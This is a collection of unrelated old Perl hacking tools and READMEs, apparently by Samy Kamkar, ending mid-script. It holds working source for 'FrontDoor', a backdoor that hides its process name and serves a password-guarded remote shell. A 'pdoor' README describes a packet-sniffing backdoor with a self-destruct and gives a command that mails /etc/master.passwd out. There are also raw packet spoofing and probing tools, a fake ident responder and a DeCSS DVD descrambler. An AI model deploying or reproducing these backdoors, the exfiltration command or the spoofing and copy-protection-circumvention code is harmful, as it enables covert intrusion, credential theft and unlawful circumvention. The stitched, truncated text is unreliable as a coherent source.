- number, add a new one, incrementing the number by 1.
- For example, if you have a fresh screamingCobra.pl,
- you would stick in:
- $technique3 = "your technique to be GET'd";
- The 3 is because there are already two other techniques.
- Now to actually be able to use the 3rd technique (and
- all techniques ending with a number less than 3 [2, 1]),
- you must add that many '-e's when running screamingCobra.
- For example, if you wanted to run screamingCobra using
- technique 3, you would run like so:
- ./screamingCobra.pl -eee http://host.name
- You may of course use any other arguements, as well, and
- use whatever host/port/page you want to.
- __________________________
- 5. __ COMMAND-LINE OPTIONS __
- ==========================
- usage: screamingCobra.pl [-e] [-i] [-s|-v] <http://host.name>[:port][/start/page]
- -e: EXTRA TECHNIQUES
- Uses multiple techniques to find bugs.
- This will take over twice the amount of time to
- complete a scan and the other techniques used with
- this options are not commonly found in applications
- but if you need to do a very strong pen test, you
- may want to use this option.
- -i: DON'T IGNORE ANY FILES
- In the program, there is a user-configurable array
- of extensions to ignore (not to GET). Those include
- images, compressed files, etc.. This is because those
- files will usually not be HTML pages so there won't
- be any useful data in them, and they may take up a lot
- of bandwidth as well. This option ignores that list
- and screamingCobra will not ignore any files.
- -s: STATUS BAR
- This creates a status bar with constantly updated
- numbers of pages accessed, bugs found and attempted
- vulnerability scans. Cannot be used with verbose,
- although the status bar is ALWAYS displayed when the
- user unexpectedly exits or kills the application (^C)
- or when the application is finished crawling.
- -v: VERBOSE
- This will display all the files being accessed and
- will also list when CGIs are found and attempted to
- be broken (to find vulnerabilities). Cannot be used
- with status bar, although a status bar is ALWAYS
- displayed when the user unexpectedly exits or kills the
- application (^C) or when the application is finished
- crawling.
- <http://host.name>: Hostname or IP of host to scan. [REQUIRED]
- For example, http://cobra.LucidX.com
- [:port]: Port to connect to, default is 80.
- For example, http://cobra.LucidX.com:80
- [/start/page]: Page to start on.
- For example, http://cobra.LucidX.com/screamingCobra-1.03/
- and also, http://cobra.LucidX.com:80/index.html
- __________________________________
- 6. __ SUPPORTED OPERATING SYSTEMS __
- ==================================
- screamingCobra will work on ANY operating system that has
- Perl 5.x.
- I also compiled a binary for
- Windows, sCobra-WIN.exe.
- This will be recompiled for every new version of
- screamingCobra and will be included in all releases.
- ===================
- == END OF README ==
- ===================
- That's all for now.
- Contact me (Samy Kamkar) at commport5@LucidX.com for
- questions or comments, hope to hear from you all! :)
- http://samy.pl/scobra/downloads/CURRENT/
- #!/usr/bin/perl
- # by CommPort5[@LucidX.com] (samy)
- # opens a pty instead of just a plain connection so ansi can get through, PoC
- $login = 0; # if = 1, use $loginbin to login as a regular user
- # if = 0, use it's own username and password
- # login not active yet!
- $0 = "FrontDoor"; # what to show instead of 'perl frontdoor.pl' in a ps
- $pwprompt = 2; # if = 2, prompts you for a username and password
- # if = 1, prompts you for a password
- # if = 0, accepts the password (but no text is shown)
- $amtusers = 02; # amount of connections allowed at once
- $username = "cp5"; # username (required, but only used if $pwprompt = 1 or 2)
- $password = "passwd"; # password
- $port = 11223; # port to bind to
- $bindtoip = 0; # if = 1, binds to $ip
- # if = 0, ignores $ip and binds to default IP
- $ip = "123.45.67.89"; # binds to this ip only if $bindtoip = 1
- $loginbin = "/usr/bin/login"; # path to `login` bin
- use blib;
- use Cwd;
- use IO::Pty;
- use IO::Socket;
- use Term::ANSIColor;
- require POSIX;
- defined($fork = fork());
- ($fork) && die "FrontDoor running on PID $fork\n";
- $ver = "0.1b2";
- if($bindtoip) {
- $x = IO::Socket::INET->new(
- LocalPort => $port,
- LocalAddr => $ip,
- Listen => $amtusers,
- Proto => 'tcp',
- Reuse => 1)
- or die "Unable to bind to socket: $!\n";;
- }
- else {
- $x = IO::Socket::INET->new(
- LocalPort => $port,
- Listen => $amtusers,
- Proto => 'tcp',
- Reuse => 1)
- or die "Unable to bind to socket: $!\n";
- }
- while(my $c = $x->accept) {
- die unless defined(my $child = fork());
- if ($child == 0) {
- $x->close;
- interact($c);
- exit 0;
- }
- }
- continue {
- $c->close;
- }
- sub interact {
- my $s = shift;
- STDIN->fdopen($s, "r");
- STDOUT->fdopen($s, "w");
- STDERR->fdopen($s, "w");
- STDOUT->autoflush(1);
- if($pwprompt == 2) {
- print colored("\nWelcome! ", 'red');
- print "This host is running ";
- print colored("FrontDoor ", 'bold');
- print colored("[$0] ", 'bold blue');
- print colored("v.$ver\n\n", 'bold red');
- print "Login: ";
- chomp($us = <STDIN>);
- print "Password: ";
- }
- if($pwprompt == 1) {
- print colored("\nWelcome! ", 'red');
- print "This host is running ";
- print colored("FrontDoor ", 'bold');
- print colored("[$0] ", 'bold blue');
- print colored("v.$ver\n\n", 'bold red');
- print "\nPassword: ";
- }
- chomp($x = <STDIN>);
- if($pwprompt == 2 and $us !~ /^$username/i) {
- die "\nIncorrect username or password\n";
- close($x);
- }
- if($x =~ /^$password/) {
- print "\n";
- do {
- $pwd = cwd;
- print "pt";
- print colored("SH", 'bold');
- print colored("[", 'bold blue');
- print colored("$username", 'red');
- print colored("\@", 'bold green');
- print colored("$pwd", 'yellow');
- print colored("]", 'bold blue');
- print colored("\$", 'underline bold blink black on_white');
- print " ";
- chomp($y = <STDIN>);
- if($y =~ /^\s*exit/) {
- die "Good bye, $username!\n";
- }
- else {
- @cm = split(/\s+/, $y);
- $pty = new IO::Pty;
- if(@cm and $cm[0] =~ /^cd$/) {
- chdir($cm[1]);
- $num = 2;
- while($cm[$num]) {
- $nc .= $cm[$num];
- $num++;
- }
- @cm = split(/\s+/, $nc);
- }
- if(@cm and $cm[0] !~ /^cd$/) {
- my $pid = fork;
- die "Cannot fork: $!" if($pid < 0);
- if($pid) {
- parent($pty);
- }
- else {
- child($pty);
- }
- }
- sub child {
- my($pty) = @_;
- POSIX::setsid();
- my $tty = $pty->slave;
- close($pty);
- open(STDIN, "<&".fileno($tty)) || (sleep(5), die "Cannot open STDIN");
- open(STDOUT, ">&".fileno($tty)) || (sleep(5), die "Cannot open STDOUT");
- open(STDERR, ">&STDOUT") || (sleep(5), die "Cannot open STDERR");
- close($tty);
- my $prog = shift(@cm);
- if(!@cm && $prog =~ /sh$/) {
- exec $prog '-sh'
- }
- exec($prog, @cm);
- die "Unable to execute\n";
- }
- sub process {
- my($rin, $src, $dst) = @_;
- my $buf = '';
- my $read = sysread($src, $buf, 1);
- if(defined $read && $read) {
- syswrite($dst, $buf, $read);
- }
- else {
- vec($rin, fileno($src), 1) = 0;
- }
- return $rin;
- }
- sub parent {
- my($pty) = @_;
- my $tty = $pty;
- my($rin, $win, $ein) = ('', '', '');
- vec($rin, fileno(STDIN), 1) = 1;
- vec($rin, fileno($tty), 1) = 1;
- vec($win, fileno($tty), 1) = 1;
- vec($ein, fileno($tty), 1) = 1;
- select($tty);
- $| = 1;
- select(STDOUT);
- $| = 1;
- while(1) {
- my($rout, $wout, $eout, $timeleft);
- ($nfound, $timeleft) = select($rout = $rin, $wout = $win, $eout = $ein, 3600);
- die "select failed: $!" if($nfound < 0);
- if($nfound > 0) {
- if(vec($eout, fileno($tty), 1)) {
- }
- if(vec($rout, fileno($tty), 1)) {
- $rin = process($rin, $tty, STDOUT);
- last unless(vec($rin, fileno($tty), 1));
- }
- elsif(vec($rout, fileno(STDIN), 1) && vec($wout, fileno($tty), 1)) {
- $rin = process($rin, STDIN, $tty);
- }
- }
- }
- }
- }
- }
- while(1);
- }
- else {
- if($pwprompt == 2) {
- die "\nIncorrect username or password\n";
- close($x);
- }
- if($pwprompt == 1) {
- die "\nIncorrect password\n";
- close($x);
- }
- if($pwprompt == 0) {
- die "\n";
- close($x);
- }
- }
- }
- #!/usr/bin/perl
- # by samy [commport5@lucidx.com]
- # requires pdump::Sniff - http://secure.lucidx.com/pdump-devel.tar.gz [pdump.lucidx.com/pdump.tar.gz but it's older]
- use pdump::Sniff;
- use Tk;
- $mdb = MainWindow->new();
- @iphdr = qw(version ihl tos tot_len id frag_off ttl protocol check saddr daddr);
- @tcphdr = qw(source dest seq ack_seq doff res1 res2 urg ack psh rst syn fin window check urg_ptr data);
- @udphdr = qw(source dest len check data);
- @icmphdr = qw(type code check gateway id sequence unused mtu data);
- $mdb->title(" Raw Packet Injector");
- $status = $mdb->Label(-width => 30, -relief => "sunken", -bd => 1);
- $status->pack(-side => "bottom", -fill => "y", -padx => 2, -pady => 1);
- $mhead = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
- $mright = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'ne', -side => 'right');
- $mright->Label(-text => 'Packet Type')->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
- @typerad = ('TCP', 'UDP', 'ICMP');
- for my $type (0 .. 2) {
- $mright->Radiobutton(-text => "$typerad[$type]", -variable => \$dbtype, anchor => 'w', -relief => 'flat', -value => $type)->pack(-side => 'top');
- }
- $mright->Label(-text => "\nPackets")->pack;
- $speed = $mright->Entry(-borderwidth => 2, -width => 8)->pack;
- $speed->insert('end', "1");
- $mright->Label(-text => "\n")->pack;
- $mright->Button(-text => "TCP Headers", -command => \&tcph)->pack;
- $mright->Button(-text => "UDP Headers", -command => \&udph)->pack;
- $mright->Button(-text => "ICMP Headers", -command => \&icmph)->pack;
- $mw1 = $mdb->Frame()->pack(-side => 'left', -pady => 2, -padx => 15);
- $mw1->Label(-text => "IP Headers\n", -anchor => 'e')->pack;
- foreach (0 .. 20) {
- if ($iphdr[$_]) {
- $x{$_} = $mw1->Frame();
- $x{$_}->pack(-pady => '2', -anchor => 'e');
- $tmp = $x{$_}->Label(-text => $iphdr[$_], -anchor => 'e');
- $t = "ip_$iphdr[$_]";
- ${$t} = $x{$_}->Entry(-width => '17', -relief => 'sunken')->pack(-side => 'right');
- $tmp->pack(-side => 'right');
- }
- }
- $balloon = $mdb->Balloon(-statusbar => $status);
- $btnok = $mhead->Button(-text => 'Send');
- $btnok->configure(-command => \&write);
- $btnok->pack(-side => 'left', -padx => '2');
- $balloon->attach($btnok, -balloonmsg => "Send packet(s)", -statusmsg => "Send packet(s)");
- $btnsave = $mhead->Button(-text => 'Information');
- $btnsave->configure(-command => \&info);
- $btnsave->pack(-side => 'left', -padx => '2');
- $balloon->attach($btnsave, -balloonmsg => "Valuable Information", -statusmsg => "Information on this program");
- $btncancel = $mhead->Button(-text => 'Exit', -command => [$mdb,'destroy']);
- $btncancel->pack(-side => 'left', -padx => '2');
- $balloon->attach($btncancel, -balloonmsg => "Exit Program", -statusmsg => "Exit Program");
- MainLoop;
- sub write {
- my (%ttcp, %tip, %ip, %tcp, %udp, %icmp, %ticmp, %tudp);
- foreach (@tcphdr) {
- $t = "tcp_$_";
- if (${$t}) {
- $ttcp{$_} = ${$t};
- }
- }
- foreach (@iphdr) {
- $t = "ip_$_";
- if (${$t}) {
- $tip{$_} = get ${$t};
- }
- }
- foreach (keys(%tip)) {
- if ($tip{$_}) {
- $ip{$_} = $tip{$_};
- }
- }
- foreach (keys(%ttcp)) {
- if ($ttcp{$_}) {
- $tcp{$_} = $ttcp{$_};
- }
- }
- foreach (@udphdr) {
- $t = "udp_$_";
- if (${$t}) {
- $tudp{$_} = ${$t};
- }
- }
- foreach (keys(%tudp)) {
- if ($tudp{$_}) {
- $udp{$_} = $tudp{$_};
- }
- }
- foreach (@icmphdr) {
- $t = "icmp_$_";
- if (${$t}) {
- $ticmp{$_} = ${$t};
- }
- }
- foreach (keys(%ticmp)) {
- if ($ticmp{$_}) {
- $icmp{$_} = $ticmp{$_};
- }
- }
- $sp = get $speed;
- foreach (1 .. $sp) {
- $a = new pdump::Sniff;
- if ($dbtype == 0) {
- $a->set({ip => { %ip }, tcp => { %tcp }});
- }
- elsif ($dbtype == 1) {
- $a->set({ip => { %ip }, udp => { %udp }});
- }
- elsif ($dbtype == 2) {
- $a->set({ip => { %ip }, icmp => { %icmp }});
- }
- $a->send;
- }
- }
- sub info {
- my $top2 = $mdb->Toplevel;
- $top2->Label(-text => "\n Perl/Tk Raw Packet Injecting Utility \n by samy [CommPort5\@LucidX.com] \n")->pack;
- }
- sub tcph {
- $f = $mdb->DialogBox(-title => "TCP Headers", -buttons => ["OK"]);
- $n = $f->add('NoteBook', -ipadx => 6, -ipady => 6);
- $address_p = $n->add("address", -label => "Required", -underline => 0);
- $pref_p = $n->add("pref", -label => "Optional", -underline => 0);
- $address_p->LabEntry(-label => "Source Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$tcp_source)->pack(-side => "top", -anchor => "ne");
- $address_p->LabEntry(-label => "Dest. Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$tcp_dest)->pack(-side => "top", -anchor => "ne");
- foreach (2 .. 20) {
- if ($tcphdr[$_]) {
- $tmp = "tcp_$tcphdr[$_]";
- $pref_p->LabEntry(-label => "$tcphdr[$_]:", -labelPack => [-side => "left"], -width => 15, -textvariable => \${$tmp})->pack(-side => "top", -anchor => "ne");
- }
- }
- $n->pack(-expand => "yes", -fill => "both", -padx => 5, -pady => 5, -side => "top");
- $f->Show;
- }
- sub udph {
- $f = $mdb->DialogBox(-title => "UDP Headers", -buttons => ["OK"]);
- $n = $f->add('NoteBook', -ipadx => 6, -ipady => 6);
- $address_p = $n->add("address", -label => "Required", -underline => 0);
- $pref_p = $n->add("pref", -label => "Optional", -underline => 0);
- $address_p->LabEntry(-label => "Source Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$udp_source)->pack(-side => "top", -anchor => "ne");
- $address_p->LabEntry(-label => "Dest. Port Number:", -labelPack => [-side => "left", -anchor => "w"], -width => 20, -textvariable => \$udp_dest)->pack(-side => "top", -anchor => "ne");
- foreach (2 .. 5) {
- if ($udphdr[$_]) {
- $tmp = "udp_$udphdr[$_]";
- $pref_p->LabEntry(-label => "$udphdr[$_]:", -labelPack => [-side => "left"], -width => 15, -textvariable => \${$tmp})->pack(-side => "top", -anchor => "ne");
- }
- }
- $n->pack(-expand => "yes", -fill => "both", -padx => 5, -pady => 5, -side => "top");
- $f->Show;
- }
- sub icmph {
- $f = $mdb->DialogBox(-title => "ICMP Headers", -buttons => ["OK"]);
- $n = $f->add('NoteBook', -ipadx => 6, -ipady => 6);
- $address_p = $n->add("address", -label => "Required", -underline => 0);
- $pref_p = $n->add("pref", -label => "Optional", -underline => 0);
- $address_p->Label(-text => "None", -anchor => 'e')->pack;
- foreach (0 .. 10) {
- if ($icmphdr[$_]) {
- $tmp = "icmp_$icmphdr[$_]";
- $pref_p->LabEntry(-label => "$icmphdr[$_]:", -labelPack => [-side => "left"], -width => 15, -textvariable => \${$tmp})->pack(-side => "top", -anchor => "ne");
- }
- }
- $n->pack(-expand => "yes", -fill => "both", -padx => 5, -pady => 5, -side => "top");
- $f->Show;
- }
- #!/usr/bin/perl
- # -cp5
- use pdump::Sniff;
- @iphdr = qw(version ihl tos tot_len id frag_off ttl protocol check saddr daddr);
- @tcphdr = qw(source dest seq ack_seq doff res1 res2 urg ack psh rst syn fin window check urg_ptr data);
- foreach (@iphdr) {
- print "IP: $_";
- if (/^(s|d)addr$/i) {
- print " [required]";
- }
- print ": ";
- chomp ($ip{$_} = <STDIN>);
- }
- foreach (@tcphdr) {
- print "TCP: $_";
- if (/^source|dest$/i) {
- print " [required]";
- }
- print ": ";
- chomp ($tcp{$_} = <STDIN>);
- }
- foreach (keys(%ip)) {
- if ($ip{$_}) {
- $hip{$_} = $ip{$_};
- }
- }
- foreach (keys(%tcp)) {
- if ($tcp{$_}) {
- $htcp{$_} = $tcp{$_};
- }
- }
- $a = new pdump::Sniff;
- $a->set({ip => { %hip }, tcp => { %htcp }});
- $a->send;
- #!/usr/bin/perl
- use pdump::Sniff;
- use Net::Ping;
- die "usage: $0 <host>\n" unless @ARGV == 1;
- $| = 1;
- $tout = 10;
- $host = $ARGV[0];
- $dev = pdump::Sniff::lookupdev($tout);
- $ip = ${ifaddrlist()}{$dev};
- $packet_tcp = new pdump::Sniff({tcp=>{}});
- $filt_tcp = "ip proto \\tcp and src host $host and dst host $ip";
- $pcap_tcp = $packet_tcp->pcapinit($dev, $filt_tcp, 1500, 60, 0);
- $offset_tcp = linkoffset($pcap_tcp);
- $p = Net::Ping->new("icmp");
- if ($p->ping($host, 2)) {
- die "ICMP reply from $host recieved, host is up\n";
- }
- $p->close();
- print "No ICMP reply...testing TCP\n";
- if ($fork1 = fork) {
- &send;
- }
- if ($fork2 = fork) {
- loop $pcap_tcp, -1, \&check_tcp, \@packet_tcp;
- }
- sub check_tcp{
- print "TCP reply from $host recieved, host is up\n";
- kill(9, $fork1);
- die "\n";
- }
- sub send {
- sleep 3;
- foreach (1 .. 65535) {
- $a = new pdump::Sniff;
- $a->set({
- ip => {
- saddr => $ip,
- daddr => $host,
- },
- tcp => {
- dest => $_,
- source => 1337,
- seq => 31337,
- syn => 1,
- },
- });
- $a->send;
- }
- die "No TCP reply...host seems to not be up\n";
- }
- #!/usr/bin/perl
- # stand-alone raw wanna-be-ident daemon
- # PoC by commport5
- use pdump::Sniff;
- die "usage: $0 <port>\n" unless @ARGV == 1;
- $| = 1;
- $tout = 10;
- $dev = pdump::Sniff::lookupdev($tout);
- $ip_addr = ${ifaddrlist()}{$dev};
- $packet_tcp = new pdump::Sniff({tcp=>{}});
- $filt_tcp = "ip proto \\tcp and dst port $ARGV[0]";
- $pcap_tcp=$packet_tcp->pcapinit($dev,$filt_tcp,1500,60);
- $offset_tcp = linkoffset($pcap_tcp);
- if (fork) {
- loop $pcap_tcp, -1, \&check_tcp, \@packet_tcp;
- }
- sub check_tcp{
- $packet_tcp->bset($_[2], $offset_tcp);
- my $headers;
- my ($vers,$ihl,$tos,$tot,$id,$frg,$ttl,$pro,$chc,$saddr,$daddr,$sport,$dport,$seq,$aseq,$dof,$res1,$res2,$urg,$ack,$psh,$rst,$syn,$fin,$win,$chk,$data) =
- $packet_tcp->get({ip=>['version','ihl','tos','tot_len','id','frag_off','ttl','protocol','check','saddr','daddr'],tcp=>[
- 'source','dest','seq','ack_seq','doff','res1','res2','urg','ack','psh','rst','syn','fin','window','check','data']});
- if ($urg) {
- $headers .= "U";
- }
- if ($ack) {
- $headers .= "A";
- }
- if ($psh) {
- $headers .= "P";
- }
- if ($rst) {
- $headers .= "R";
- }
- if ($syn) {
- $headers .= "S";
- }
- if ($fin) {
- $headers .= "F";
- }
- unless ($headers) {
- $headers = ".";
- }
- $sname = &ip2dot($saddr);
- $dname = &ip2dot($daddr);
- if ($headers eq "S" and !$sent) {
- $rand = rand;
- $rand =~ s/^0\.(\d{9}).*?$/$1/;
- $a = new pdump::Sniff;
- $a->set({ip => {
- saddr => $dname,
- daddr => $sname }, tcp => {
- dest => $sport,
- source => $dport,
- seq => $rand,
- ack_seq => ($seq - 1),
- ack => 1,
- syn => 1 }});
- $a->send;
- $sent = 1;
- }
- if ($headers eq "P" and $sent == 1) {
- $ndata = "$data : USERID : UNIX :cp5\n";
- $a = new pdump::Sniff;
- $a->set({ip => {
- saddr => $dname,
- daddr => $sname }, tcp => {
- dest => $sport,
- source => $dport,
- seq => $aseq,
- ack_seq => ($seq - length($data)),
- ack => 1 }});
- $a->send;
- $a = new pdump::Sniff;
- $a->set({ip => {
- saddr => $dname,
- daddr => $sname }, tcp => {
- dest => $sport,
- source => $dport,
- seq => $aseq,
- ack_seq => ($seq - length($data)),
- ack => 1,
- psh => 1,
- data => $ndata }});
- $a->send;
- $a = new pdump::Sniff;
- $a->set({ip => {
- saddr => $dname,
- daddr => $sname }, tcp => {
- dest => $sport,
- source => $dport,
- seq => ($aseq - length($ndata)),
- ack_seq => ($seq - length($data)),
- ack => 1,
- fin => 1 }});
- $a->send;
- $sent = 2;
- }
- if ($headers eq "F" and $sent == 2) {
- $a = new pdump::Sniff;
- $a->set({ip => {
- saddr => $dname,
- daddr => $sname }, tcp => {
- dest => $sport,
- source => $dport,
- seq => $aseq,
- ack_seq => ($seq - 1),
- ack => 1,
- fin => 1 }});
- $a->send;
- $sent = 3;
- }
- if ($headers eq "F" and $sent == 3) {
- $a = new pdump::Sniff;
- $a->set({ip => {
- saddr => $dname,
- daddr => $sname }, tcp => {
- dest => $sport,
- source => $dport,
- seq => $aseq,
- ack_seq => ($seq - 1),
- ack => 1 }});
- $a->send;
- $sent = 0;
- }
- }
- sub ip2name {
- my $addr = shift;
- (gethostbyaddr(pack("N",$addr),AF_INET))[0] || ip2dot($addr);
- }
- sub ip2dot {
- sprintf("%u.%u.%u.%u",unpack "C4", pack "N1", shift);
- }
- Index of /pdoor
- Name
- Last modified
- Size
- Description
- ________________________________________
- Parent Directory
- -
- README
- 06-Apr-2005 00:21 1.0K
- pcl.pl
- 06-Apr-2005 00:21 702
- pdoor.pl
- 06-Apr-2005 00:21 371
- pdump-Sniff-0.781.tar.gz
- 06-Apr-2005 00:21 25K
- x.html
- 06-Apr-2005 00:21 53
- ________________________________________
- This is a backdoor (pdoor.pl) which sniffs raw packets
- going across the network. It allows you to run commands
- without opening any ports on the machine that the backdoor
- is running. It does this by sniffing all packets on port
- 80 and 7331. Usually port 80 is open, so, if you want,
- you can use telnet and telnet to some machine on that
- network on port 80. Then you would give it something like
- this:
- GET / HTTP/2cat /etc/master.passwd|mail user@blah
- It will read anything after 'GET / HTTP/2' as a
- command. If port 80 isn't open on any machines on the
- network, you can use pcl.pl to send a raw packet with
- data to port 7331 (which won't be open, but pdoor.pl
- will see the packet anyways). You can connect to
- pretty much any machine on the network, not just the one
- which the backdoor running. This is because pdoor.pl
- will try to sniff the entire network. It also contains
- a self destruct feature (it will remove itself and then
- die, practically untracable) when you do this:
- GET / HTTP/2DIE
- If you're using the pcl.pl, you only have to type:
- DIE
- -cp5
- http://www.samy.pl/pdoor/
- #!/usr/bin/perl
- # server/daemon for netshow [mp3]
- # by samy [CommPort5@LucidX.com]
- $port = 1337;
- $dev = "/dev/dsp";
- $mp3dir = "/mp3";
- $kilobytes = 64;
- $mp3first = 1;
- sub hashes {
- %set = (
- create => 'yes',
- exclusive => 'no',
- mode => 0644,
- destroy => 'yes',
- );
- %read = (
- create => 'no',
- exclusive => 'no',
- mode => 0644,
- destroy => 'no',
- );
- return (\%set, \%read);
- }
- ($setx, $readx) = hashes();
- %set = %$setx;
- %read = %$readx;
- tie my $kb, 'IPC::Shareable', 'kilobytes', { %set };
- $kb = $kilobytes * 1024;
- use IPC::Shareable;
- print "Running server on port $port at $kilobytes kb per packet\n";
- fork() && front($mp3first, $kb);
- fork() && ipc($kilobytes);
- sock($port, $mp3dir, $mp3first);
- sub front {
- $SIG{INT} = sub { close(DEV); die "exiting...\n"; };
- ($setx, $readx) = hashes();
- %set = %$setx;
- %read = %$readx;
- tie my $kb, 'IPC::Shareable', 'kilobytes', { %set };
- tie my $playmp, 'IPC::Shareable', 'micormp', { %set };
- $playmp = $_[0];
- $kb = $_[1];
- tie my $mp3, 'IPC::Shareable', 'mpeg', { %read };
- while (1) {
- chomp($tmpp = <STDIN>);
- s/^\s*//;
- if ($tmpp =~ /^help/) {
- print << "EOC";
- commands:
- status - status of stream
- mic - switch to microphone
- mp3 - switch to mp3s
- exit - close daemon
- kb [#] - view/change kbps
- help - this help
- EOC
- }
- elsif ($tmpp =~ /^status/) {
- if ($playmp % 2 == 1) {
- print "status: MP3 playing ($mp3)\n";
- }
- else {
- print "status: microphone in use\n";
- }
- }
- elsif ($tmpp =~ /^kb\s*(\S*)/) {
- if ($1) {
- $kilobytes = $1;
- $kb = $kilobytes * 1024;
- }
- else {
- print "kilobytes: $kilobytes\n";
- }
- }
- elsif ($tmpp =~ /^exit/) {
- close(DEV);
- die "exiting...\n";
- }
- elsif ($tmpp =~ /^mic/) {
- if ($playmp % 2 == 1) {
- $playmp++;
- print "Changing audio input to microphone...\n";
- }
- else {
- print "Microphone already in use.\n";
- }
- }
- elsif ($tmpp =~ /^mp3/) {
- if ($playmp % 2 == 1) {
- print "MP3 already playing.\n";
- }
- else {
- print "Changing audio input to MP3...\n";
- $playmp++;
- }
- }
- elsif ($tmpp !~ /^$/) {
- print "Invalid command...type 'help' for help.\n";
- }
- }
- }
- sub sock {
- ($setx, $readx) = hashes();
- %set = %$setx;
- %read = %$readx;
- ($port, $mp3dir, $playmp3) = @_;
- tie my $kb, 'IPC::Shareable', 'kilobytes', { %read };
- tie my $mp3, 'IPC::Shareable', 'mpeg', { %set };
- opendir(MPEG, $mp3dir);
- @mp3s = grep { /^[^\.]/ } readdir(MPEG);
- closedir(MPEG);
- use IO::Socket;
- $con = IO::Socket::INET->new(
- LocalPort => $port,
- Listen => 5,
- Reuse => 1,
- );
- $con->autoflush(1);
- tie my $tmmp, 'IPC::Shareable', 'micormp', { %read };
- while ($sock = $con->accept) {
- $peerhost = $sock->peerhost();
- print "$peerhost connected\n";
- $child = fork();
- unless ($child) {
- $con->close;
- while ($sock) {
- $mp3 = $mp3s[int(rand(@mp3s))];
- if ($playmp3 % 2 == 1) {
- print $sock "HTTP/1.0 200 OK\n";
- print $sock "Content-Type: audio/x-mp3stream\n";
- print $sock "Cache-Control: no-cache\n";
- print $sock "Pragma: no-cache\n";
- print $sock "Connection: close\n";
- print $sock "x-audiocast-name: CommPort5 owns youz0r!\n\n";
- open(MPEG, "lame -b 32 --resample 44.1 $mp3dir/$mp3 - 2>> /dev/null |");
- while (sysread(MPEG, $au, 32 * 1024)) {
- print $sock $au;
- if ($tmmp % 2 != $playmp3 % 2) {
- $playmp3++;
- last;
- }
- }
- close(MPEG);
- }
- else {
- print $sock "HTTP/1.0 200 OK\n";
- print $sock "Content-Type: audio/x-mp3stream\n";
- print $sock "Cache-Control: no-cache\n";
- print $sock "Pragma: no-cache\n";
- print $sock "Connection: close\n";
- print $sock "x-audiocast-name: CommPort5 owns you!\n\n";
- while ( tie $aud, 'IPC::Shareable', 'audio', { %read }){
- print $sock $aud;
- if ($tmmp % 2 != $playmp3 % 2) {
- $playmp3++;
- last;
- }
- }
- }
- }
- exit 0;
- }
- }
- }
- sub ipc {
- ($kb) = @_;
- ($setx, $readx) = hashes();
- %set = %$setx;
- %read = %$readx;
- open(DEV, "sox -w -t ossdsp $dev -t wav - speed 0.5 2>>/dev/null | lame -b 32 --resample 44.1 - - 2>> /dev/null|") or die
- "Can't open sox/lame: $!\n";
- while (tie $aud, 'IPC::Shareable', 'audio', { %set }) {
- sysread(DEV, $aud, 32 * 1024);
- }
- }
- #!/usr/bin/perl
- # RC4 in 146 bytes of code
- #
- # usage: echo 'plain text' | rc4.pl hexkey > encrypted.file
- # or
- # cat /path/to/file | rc4.pl hexkey > encrypted.file
- # e.g., echo testing | rc4.pl a0b1c2d3
- #
- # decrypting goes the same way
- # e.g., cat encrypted.file | rc4.pl a0b1c2d3 > decrypted.file
- #
- # -samy [cp5@LucidX.com]
- sub f{@s[$x,$y]=@s[($y+=$s[$x])%=@s,$x];$s[$x++]+$s[$y]-@s}@k=pop=~/../g;f$y+=hex$k[$x%@k]for@s=0..255;$x=1;$y=0;$/=\1;print$_^chr$s[f$x%=@s]for<>
- #!/usr/bin/perl
- # 1st place in toorcon password challenge
- # challenge was to create a program or algorithm that generates a password
- # for a user that's difficult for people to crack or brute force but is easy
- # for the user to remember (takes a word as a command line arguement and randomly
- # modifies it with a simple algorithm)
- # i shortened and obfuscated it just to be cool :)
- # -cp5
- s''%{uc c}=(a,4,b,6,e,3,i,1,l,1,t,7);for(keys%{uc c}){C{uc}=C{_};C{C{_}}=_}
- for(0..Z2){myB;for(split//,ARGV[0]){_=C{_}ifC{_}&&int Z2;B.=_}Z2?D.=reverseB:D.=B}
- print"D\n"';s/Z/rand /g;s/[A-D_]/\$$&/g;eval
- # cp5 crypt functions
- # create an encrypted password
- sub mkpasswd {
- $what = $_[0];
- $salt = chr(65+rand(27)).chr(65+rand(27));
- $salt =~ s/\W/x/g;
- return crypt($what, $salt);
- }
- # check an encrypted password with a non-encrypted one
- sub ckpasswd {
- ($plain, $encrypted) = @_;
- if (!$encrypted) {
- ($plain, $encrypted) = split(/\s+/, $plain, 2);
- }
- return '' unless ($plain && $encrypted);
- if ($encrypted =~ /^\$\d\$(\w\w)\$/) {
- $salt = $1;
- }
- else {
- $salt = substr($encrypted, 0, 2);
- }
- return ($encrypted eq crypt($plain, $salt));
- }
- 1;
- #!/usr/bin/perl
- # MPEG 2 PS VOB file on stdin -> descrambled output on stdout
- # arguments: title key bytes in least to most-significant order
- # perl -I xx:xx:xx:xx:xx cp5qrpff-fast.pl < file.vob | extract_mpeg2 | mpeg2dec
- # where xx:xx:xx:xx:xx is the title key
- s''while(read+STDIN,_,2048){Q=29;O=73;J=142;P=255;@t=map{_%16orP^=J^=(Y
- =(11,10,116,100,11,122,20,100)[_/16%8])&110;P^=(72,@z=(64,72,Q^=12*(_%
- 16-2?0:Y&17)),O^=_%64?12:0,@z)[_%8]}(16..271);if((@a=unx"C*",_)[20]&48){
- X=5;_=unxb24,join"",@b=map{xB8,unxb8,chr(_^$a[--X+84])}@ARGV;s/...$/1$&/;
- K=unxV,xb25,_;L=256|(ord$b[4])<<9|ord$b[3];K=K>>8^(M=P&(K>>12^K>>4^K^K/8
- ))<<17,L=L>>8^(P&(W=(Z=L>>14&7^L)^Z*8^Z<<6))<<9,_=$t[_]^((X>>=8)+=M+(~W&P
- ))for@a[128..$#a]}print+x"C*",@a}';s/x/pack+/g;s/[O-QJ-MW-Z_]/\$$&/g;eval
- #!/usr/bin/perl
- # MPEG 2 PS VOB file on stdin -> descrambled output on stdout
- # arguments: title key bytes in least to most-significant order
- s''while(read+STDIN,_,2048){P=29;J=142;if((@a=unx"C*",_)[20]&48){M=5;_=
- unxb24,join"",@b=map{xB8,unxb8,chr(_^$a[--M+84])}@ARGV;s/...$/1$&/;X=unx
